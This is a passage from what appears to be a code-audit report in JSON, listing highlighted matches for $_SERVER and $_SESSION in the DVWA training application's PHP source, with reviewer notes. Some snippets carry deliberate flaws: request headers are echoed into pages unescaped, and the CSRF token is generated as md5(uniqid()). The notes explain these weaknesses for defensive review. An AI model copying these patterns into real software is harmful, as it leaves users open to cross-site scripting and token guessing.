punctuation\">)</span><span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">12:</span> \t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"Forwarded for: &lt;em>\"</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'HTTP_X_FORWARDED_FOR'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;/em>&lt;br />\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> }\n<span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"Your user-agent address is: &lt;em>{$_SERVER[ 'HTTP_USER_AGENT' ]}&lt;/em>&lt;br />\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'HTTP_REFERER'</span><span class=\"token punctuation\">,</span> 
<span class=\"token variable\">$_SERVER</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">17:</span> \t\t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"You came from: &lt;em>{$_SERVER[ 'HTTP_REFERER' ]}&lt;/em>&lt;br />\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 12,
  "start": 7,
  "end": 18,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 193,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/fi/file3.php",
  "filetype": "php",
  "search": "\\s\\$_SERVER",
  "match": "<span class=\"line-number\">11:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'HTTP_X_FORWARDED_FOR'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SERVER</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"Forwarded for: &lt;em>\"</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'HTTP_X_FORWARDED_FOR'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;/em>&lt;br />\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> }\n<span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"Your user-agent address is: &lt;em>{$_SERVER[ 'HTTP_USER_AGENT' ]}&lt;/em>&lt;br />\"</span><span 
class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">16:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'HTTP_REFERER'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SERVER</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">17:</span> \t\t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"You came from: &lt;em>{$_SERVER[ 'HTTP_REFERER' ]}&lt;/em>&lt;br />\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> }\n<span class=\"line-number\">19:</span> \t\t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> \"I<span class=\"token string\">'m hosted at: &lt;em>{$_SERVER[ '</span>HTTP_HOST' <span class=\"token punctuation\">]</span>}<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>em<span class=\"token operator\">></span><span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">20:</span> \t\t<span class=\"token punctuation\">[</span><span class=\"token operator\">&lt;</span>em<span class=\"token 
operator\">></span><span class=\"token operator\">&lt;</span>a href<span class=\"token operator\">=</span>\\<span class=\"token string\">\"?page=include.php\\\"</span><span class=\"token operator\">></span>back<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>a<span class=\"token operator\">></span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>em<span class=\"token operator\">></span><span class=\"token punctuation\">]</span>\n<span class=\"line-number\">21:</span> \t<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>div<span class=\"token operator\">></span>",
  "line": 16,
  "start": 11,
  "end": 22,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 216,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/source/high.php",
  "filetype": "php",
  "search": "\\s\\$_SERVER",
  "match": "<span class=\"line-number\">19:</span> \t\t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">rand</span><span class=\"token punctuation\">(</span> <span class=\"token number\">0</span><span class=\"token punctuation\">,</span> <span class=\"token number\">5</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">3</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">20:</span> \t\t\t<span class=\"token function\">sleep</span><span class=\"token punctuation\">(</span> <span class=\"token function\">rand</span><span class=\"token punctuation\">(</span> <span class=\"token number\">2</span><span class=\"token punctuation\">,</span> <span class=\"token number\">4</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t\t}\n<span class=\"line-number\">22:</span> \n<span class=\"line-number\">23:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> User wasn<span class=\"token string\">'t found, so the page wasn'</span>t!\n<span class=\"highlight\"><span class=\"line-number\">24:</span> \t\t<span class=\"token function\">header</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'SERVER_PROTOCOL'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">' 404 Not Found'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">25:</span> \n<span class=\"line-number\">26:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span 
class=\"token keyword\">for</span> end user\n<span class=\"line-number\">27:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">'&lt;pre>User ID is MISSING from the database.&lt;/pre>'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">28:</span> \t}\n<span class=\"line-number\">29:</span> ",
  "line": 24,
  "start": 19,
  "end": 30,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 220,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_SERVER",
  "match": "<span class=\"line-number\">19:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> end user\n<span class=\"line-number\">20:</span> \t\t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">'&lt;pre>User ID exists in the database.&lt;/pre>'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t\t}\n<span class=\"line-number\">22:</span> \t\t<span class=\"token keyword\">else</span> {\n<span class=\"line-number\">23:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> User wasn<span class=\"token string\">'t found, so the page wasn'</span>t!\n<span class=\"highlight\"><span class=\"line-number\">24:</span> \t\t\t<span class=\"token function\">header</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'SERVER_PROTOCOL'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">' 404 Not Found'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">25:</span> \n<span class=\"line-number\">26:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> end user\n<span class=\"line-number\">27:</span> \t\t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">'&lt;pre>User ID is MISSING from the database.&lt;/pre>'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">28:</span> \t\t}\n<span 
class=\"line-number\">29:</span> \t}",
  "line": 24,
  "start": 19,
  "end": 30,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 224,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/source/low.php",
  "filetype": "php",
  "search": "\\s\\$_SERVER",
  "match": "<span class=\"line-number\">14:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> end user\n<span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">'&lt;pre>User ID exists in the database.&lt;/pre>'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \t}\n<span class=\"line-number\">17:</span> \t<span class=\"token keyword\">else</span> {\n<span class=\"line-number\">18:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> User wasn<span class=\"token string\">'t found, so the page wasn'</span>t!\n<span class=\"highlight\"><span class=\"line-number\">19:</span> \t\t<span class=\"token function\">header</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'SERVER_PROTOCOL'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">' 404 Not Found'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">20:</span> \n<span class=\"line-number\">21:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> end user\n<span class=\"line-number\">22:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">'&lt;pre>User ID is MISSING from the database.&lt;/pre>'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">23:</span> \t}\n<span 
class=\"line-number\">24:</span> ",
  "line": 19,
  "start": 14,
  "end": 25,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 18,
  "file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPage.inc.php",
  "filetype": "php",
  "search": "\\s\\$_SESSION",
  "match": "<span class=\"line-number\">45:</span> \n<span class=\"line-number\">46:</span> \n<span class=\"line-number\">47:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Start session functions <span class=\"token operator\">-</span><span class=\"token operator\">-</span>\n<span class=\"line-number\">48:</span> \n<span class=\"line-number\">49:</span> function <span class=\"token operator\">&amp;</span><span class=\"token function\">dvwaSessionGrab</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">50:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'dvwa'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">51:</span> \t\t<span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'dvwa'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">52:</span> \t}\n<span class=\"line-number\">53:</span> \treturn <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'dvwa'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">54:</span> }\n<span class=\"line-number\">55:</span> ",
  "line": 50,
  "start": 45,
  "end": 56,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 19,
  "file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPage.inc.php",
  "filetype": "php",
  "search": "\\s\\$_SESSION",
  "match": "<span class=\"line-number\">46:</span> \n<span class=\"line-number\">47:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Start session functions <span class=\"token operator\">-</span><span class=\"token operator\">-</span>\n<span class=\"line-number\">48:</span> \n<span class=\"line-number\">49:</span> function <span class=\"token operator\">&amp;</span><span class=\"token function\">dvwaSessionGrab</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">50:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'dvwa'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">51:</span> \t\t<span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'dvwa'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">52:</span> \t}\n<span class=\"line-number\">53:</span> \treturn <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'dvwa'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">54:</span> }\n<span class=\"line-number\">55:</span> \n<span class=\"line-number\">56:</span> ",
  "line": 51,
  "start": 46,
  "end": 57,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 20,
  "file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPage.inc.php",
  "filetype": "php",
  "search": "\\s\\$_SESSION",
  "match": "<span class=\"line-number\">48:</span> \n<span class=\"line-number\">49:</span> function <span class=\"token operator\">&amp;</span><span class=\"token function\">dvwaSessionGrab</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">50:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'dvwa'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">51:</span> \t\t<span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'dvwa'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">52:</span> \t}\n<span class=\"highlight\"><span class=\"line-number\">53:</span> \treturn <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'dvwa'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">54:</span> }\n<span class=\"line-number\">55:</span> \n<span class=\"line-number\">56:</span> \n<span class=\"line-number\">57:</span> function <span class=\"token function\">dvwaPageStartup</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pActions</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">58:</span> \t<span class=\"token 
function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">in_array</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'authenticated'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pActions</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {",
  "line": 53,
  "start": 48,
  "end": 59,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 21,
  "file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPage.inc.php",
  "filetype": "php",
  "search": "\\s\\$_SESSION",
  "match": "<span class=\"line-number\">521:</span> \t\t<span class=\"token function\">dvwaRedirect</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$returnURL</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">522:</span> \t}\n<span class=\"line-number\">523:</span> }\n<span class=\"line-number\">524:</span> \n<span class=\"line-number\">525:</span> function <span class=\"token function\">generateSessionToken</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> {  # Generate a brand new <span class=\"token punctuation\">(</span>CSRF<span class=\"token punctuation\">)</span> token\n<span class=\"highlight\"><span class=\"line-number\">526:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">527:</span> \t\t<span class=\"token function\">destroySessionToken</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">528:</span> \t}\n<span class=\"line-number\">529:</span> \t<span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token function\">uniqid</span><span class=\"token punctuation\">(</span><span 
class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">530:</span> }\n<span class=\"line-number\">531:</span> ",
  "line": 526,
  "start": 521,
  "end": 532,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 22,
  "file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPage.inc.php",
  "filetype": "php",
  "search": "\\s\\$_SESSION",
  "match": "<span class=\"line-number\">524:</span> \n<span class=\"line-number\">525:</span> function <span class=\"token function\">generateSessionToken</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> {  # Generate a brand new <span class=\"token punctuation\">(</span>CSRF<span class=\"token punctuation\">)</span> token\n<span class=\"line-number\">526:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">527:</span> \t\t<span class=\"token function\">destroySessionToken</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">528:</span> \t}\n<span class=\"highlight\"><span class=\"line-number\">529:</span> \t<span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token function\">uniqid</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">530:</span> }\n<span class=\"line-number\">531:</span> \n<span class=\"line-number\">532:</span> function <span class=\"token function\">destroySessionToken</span><span class=\"token punctuation\">(</span><span 
class=\"token punctuation\">)</span> {  # Destroy any session <span class=\"token keyword\">with</span> the name <span class=\"token string\">'session_token'</span>\n<span class=\"line-number\">533:</span> \t<span class=\"token function\">unset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">534:</span> }",
  "line": 529,
  "start": 524,
  "end": 535,
  "severity": "unknown",
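  "note": "Line 529 builds the anti-CSRF token as md5( uniqid() ). uniqid() is derived from the current time in microseconds and is not a cryptographically secure source, and md5 adds no entropy to it, so the token is guessable in principle. Prefer bin2hex( random_bytes( 32 ) ) on PHP 7+. checkToken is not shown in this match; confirm it compares the two values with hash_equals()."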
 },
 {
  "id": 23,
  "file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPage.inc.php",
  "filetype": "php",
  "search": "\\s\\$_SESSION",
  "match": "<span class=\"line-number\">528:</span> \t}\n<span class=\"line-number\">529:</span> \t<span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token function\">uniqid</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">530:</span> }\n<span class=\"line-number\">531:</span> \n<span class=\"line-number\">532:</span> function <span class=\"token function\">destroySessionToken</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> {  # Destroy any session <span class=\"token keyword\">with</span> the name <span class=\"token string\">'session_token'</span>\n<span class=\"highlight\"><span class=\"line-number\">533:</span> \t<span class=\"token function\">unset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">534:</span> }\n<span class=\"line-number\">535:</span> \n<span class=\"line-number\">536:</span> function <span class=\"token function\">tokenField</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> {  # Return a field <span class=\"token keyword\">for</span> the <span class=\"token punctuation\">(</span>CSRF<span class=\"token punctuation\">)</span> token\n<span class=\"line-number\">537:</span> \treturn <span class=\"token 
string\">\"&lt;input type='hidden' name='user_token' value='{$_SESSION[ 'session_token' ]}' />\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">538:</span> }",
  "line": 533,
  "start": 528,
  "end": 539,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 47,
  "file": "/home/chris/src/DVWA-master/login.php",
  "filetype": "php",
  "search": "\\s\\$_SESSION",
  "match": "<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> <span class=\"token function\">dvwaDatabaseConnect</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \n<span class=\"line-number\">10:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Login'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Anti<span class=\"token operator\">-</span>CSRF\n<span class=\"highlight\"><span class=\"line-number\">12:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'login.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span 
class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token 
punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> ",
  "line": 12,
  "start": 7,
  "end": 18,
  "severity": "unknown",
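  "note": "Line 12 reads the token from $_REQUEST although the form is handled as a POST (line 10), so a token supplied in the query string would also be passed to checkToken. Reading it from $_POST keeps the token out of URLs, server logs and Referer headers. The same $_REQUEST pattern appears in the security.php, setup.php, brute and captcha matches in this report."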
 },
 {
  "id": 55,
  "file": "/home/chris/src/DVWA-master/security.php",
  "filetype": "php",
  "search": "\\s\\$_SESSION",
